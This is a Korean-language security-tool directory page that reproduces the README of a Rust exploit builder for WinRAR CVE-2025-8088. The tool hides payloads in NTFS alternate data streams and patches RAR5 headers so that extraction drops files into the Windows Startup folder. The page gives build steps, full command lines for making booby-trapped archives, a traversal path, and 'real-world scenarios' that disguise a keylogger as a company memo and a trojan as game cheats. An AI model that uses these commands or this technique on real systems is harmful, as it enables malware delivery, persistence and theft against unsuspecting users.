Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — 고성능, 메모리 안전한 WinRAR CVE-2025-8088 익스플로잇 도구의 구현으로, 더 나은 신뢰성과 성능을 위해 Rust로 재작성되었습니다. | Kitploit
도구/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Persistence MechanismsExploitationWeb Application ExploitationPost-ExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentBinary Exploitation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

고성능, 메모리 안전한 WinRAR CVE-2025-8088 익스플로잇 도구의 구현으로, 더 나은 신뢰성과 성능을 위해 Rust로 재작성되었습니다.

저장소 보기
8311개월 전아직 검토되지 않음

WinRAR Exploit Tool - Rust Edition

고급 WinRAR 경로 탐색 공격 도구 - Rust 버전

WinRAR CVE-2025-8088 취약점을 Rust로 다시 구현한 고성능, 메모리 안전 공격 도구입니다.

기능

  • ADS 악용 - NTFS 대체 데이터 스트림을 통한 페이로드 은닉
  • RAR5 헤더 조작 - 경로 삽입을 위한 직접 헤더 패치
  • 현대적인 GUI - CSS 스타일링이 적용된 GTK 기반 인터페이스
  • 시작 프로그램 타겟팅 - Windows 시작 폴더에 자동 페이로드 배치
  • 사용자 정의 유인 파일 지원 - 기본 유인 파일 또는 직접 사용
  • 범용 파일 지원 - 페이로드와 유인 파일 모두 모든 파일 형식 지원
  • 강력한 오류 처리 - 포괄적인 오류 검사 및 진단
  • 시스템 진단 - 자동 시스템 호환성 검사
  • 메모리 효율성 - 낮은 메모리 사용량과 스마트한 리소스 관리

요구 사항

  • Rust 1.70+ - 최신 Rust 툴체인
  • GTK 개발 라이브러리 - GUI 지원용
  • WinRAR CLI - RAR 아카이브 생성용
  • Windows 10/11 - NTFS 지원 필요

빠른 시작

1. Rust 설치

root@kitploit:~
# Rustup을 사용하여 Rust 설치

# 설치 확인
rustc --version
cargo --version

2. GTK 개발 라이브러리 설치

Windows (MSVC)

root@kitploit:~
# vcpkg 사용
vcpkg install gtk:x64-windows

MSYS2 사용

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. 클론 및 빌드

root@kitploit:~
# Rust 프로젝트로 이동
cd winrar_exploit_rust

# 디버그 모드 빌드
cargo build

# 최적화된 릴리스 빌드
cargo build --release

# 애플리케이션 실행
cargo run --release

사용법

  1. 페이로드 선택 - 페이로드로 사용할 파일 선택 (.exe, .bat, .jpg, .pdf 등)
  2. 유인 파일 선택 - 유인 파일 선택 (비워두면 기본 파일 생성)
  3. 아카이브 이름 지정 - 출력 RAR 파일명 입력
  4. 빌드 - 공격 아카이브 생성

예제

기본 사용법

페이로드와 유인 파일로 간단한 공격 생성:

root@kitploit:~
# 실행 가능 페이로드로 공격 생성
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# 스크립트 페이로드로 공격 생성
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

고급 사용법

여러 유인 파일

root@kitploit:~
# 쉼표로 구분된 여러 유인 파일 사용
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

사용자 정의 드롭 디렉토리

root@kitploit:~
# 페이로드가 배치될 사용자 정의 디렉토리 지정
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

다양한 페이로드 유형

root@kitploit:~
# 이미지 페이로드 (스테가노그래피)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF 페이로드
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# 배치 스크립트 페이로드
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

시스템 진단

root@kitploit:~
# 시스템 진단 실행하여 호환성 확인
.\winrar_exploit_rust.exe diagnose

# 사용 가능한 도구 및 기능 표시
.\winrar_exploit_rust.exe tools

실제 시나리오

시나리오 1: 기업 환경

root@kitploit:~
# 회사 메모처럼 보이는 악성 문서 생성
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

시나리오 2: 게임 커뮤니티

root@kitploit:~
# 게임 치트 파일에 악성 코드 숨기기
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

작동 방식

이 도구는 경로 탐색을 사용하여 RAR 아카이브를 생성합니다:

  1. ADS 생성 - NTFS 대체 데이터 스트림에 페이로드 숨기기
  2. RAR 빌드 - WinRAR CLI를 사용하여 ADS가 포함된 기본 RAR 생성
  3. 헤더 패치 - RAR5 헤더에 탐색 경로 삽입
  4. CRC 재계산 - 아카이브 무결성 보장
  5. 출력 - 추출 준비가 된 악성 RAR 제공

경로 예시: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

지원되는 파일 유형

페이로드 파일:

  • ✅ 실행 파일 (.exe, .bat, .cmd)
  • ✅ 스크립트 (.py, .js, .vbs, .ps1)
  • ✅ 문서 (.pdf, .docx, .xlsx)
  • ✅ 이미지 (.jpg, .png, .gif)
  • ✅ 동영상 (.mp4, .avi)
  • ✅ 오디오 (.mp3, .wav)
  • ✅ 모든 파일 형식

유인 파일:

  • ✅ 텍스트 파일 (.txt, .doc, .pdf)
  • ✅ 이미지 (.jpg, .png, .gif, .bmp)
  • ✅ 동영상 (.mp4, .avi)
  • ✅ 오디오 (.mp3, .wav)
  • ✅ 문서 (.docx, .xlsx)
  • ✅ 모든 파일 형식

아키텍처

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # 애플리케이션 진입점
│   ├── gui.rs           # GTK 기반 사용자 인터페이스
│   ├── exploit.rs       # 핵심 공격 로직
│   ├── ads.rs           # NTFS ADS 조작
│   ├── rar.rs           # RAR5 헤더 조작
│   ├── diagnostics.rs   # 시스템 진단
│   └── error.rs         # 오류 처리
├── Cargo.toml           # 의존성 및 빌드 설정
└── README.md           # 이 파일

문제 해결

이 도구에는 자동 진단 기능이 포함되어 있습니다:

  • ✅ WinRAR CLI 설치 확인
  • ✅ NTFS ADS 지원 확인
  • ✅ 시작 디렉토리 권한 확인
  • ✅ GTK 라이브러리 사용 가능 여부 확인
  • ✅ 파일 시스템 호환성 확인

일반적인 문제:

  1. "GTK를 찾을 수 없음"

    root@kitploit:~
    # GTK 개발 라이브러리 설치
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # MSYS2 사용
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "WinRAR CLI를 찾을 수 없음"

    • WinRAR을 https://www.winrar.com 에서 설치
    • rar.exe가 Program Files에 있는지 확인
  3. "시작 디렉토리에 쓸 수 없음"

    • 관리자 권한으로 도구 실행
    • 폴더 권한 확인
  4. "NTFS ADS가 지원되지 않음"

    • NTFS 파일 시스템을 사용하는지 확인
    • FAT32/exFAT에서는 ADS가 지원되지 않음
  5. 컴파일 오류

    root@kitploit:~
    # Rust 툴체인 업데이트
    rustup update
    
    # 정리 및 재빌드
    cargo clean
    cargo build --release
    

코드 포맷팅

root@kitploit:~
# 코드 포맷팅
cargo fmt

# 린트
cargo clippy

의존성

주요 의존성:

  • gtk - 현대적인 GUI 프레임워크
  • tokio - 비동기 런타임
  • windows - Windows API 바인딩
  • crc32fast - 빠른 CRC32 계산
  • byteorder - 바이트 순서 조작
  • anyhow - 오류 처리

보안 고려 사항

  • 교육 목적: 이 도구는 승인된 테스트 및 교육 목적으로만 사용해야 합니다.
  • 통제된 환경: 적절한 동의를 받은 통제된 환경에서만 사용하십시오.
  • 법적 준수: 해당 법률 및 규정을 준수해야 합니다.
  • 책임 있는 공개: 책임 있는 공개 관행을 따르십시오.

라이선스

이 프로젝트는 MIT 라이선스 하에 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

제작자

Telegram @kanonufo 제작


CVE-2025-8088 공격을 위한 고성능 레드팀 도구 - Rust 버전

도구 다운로드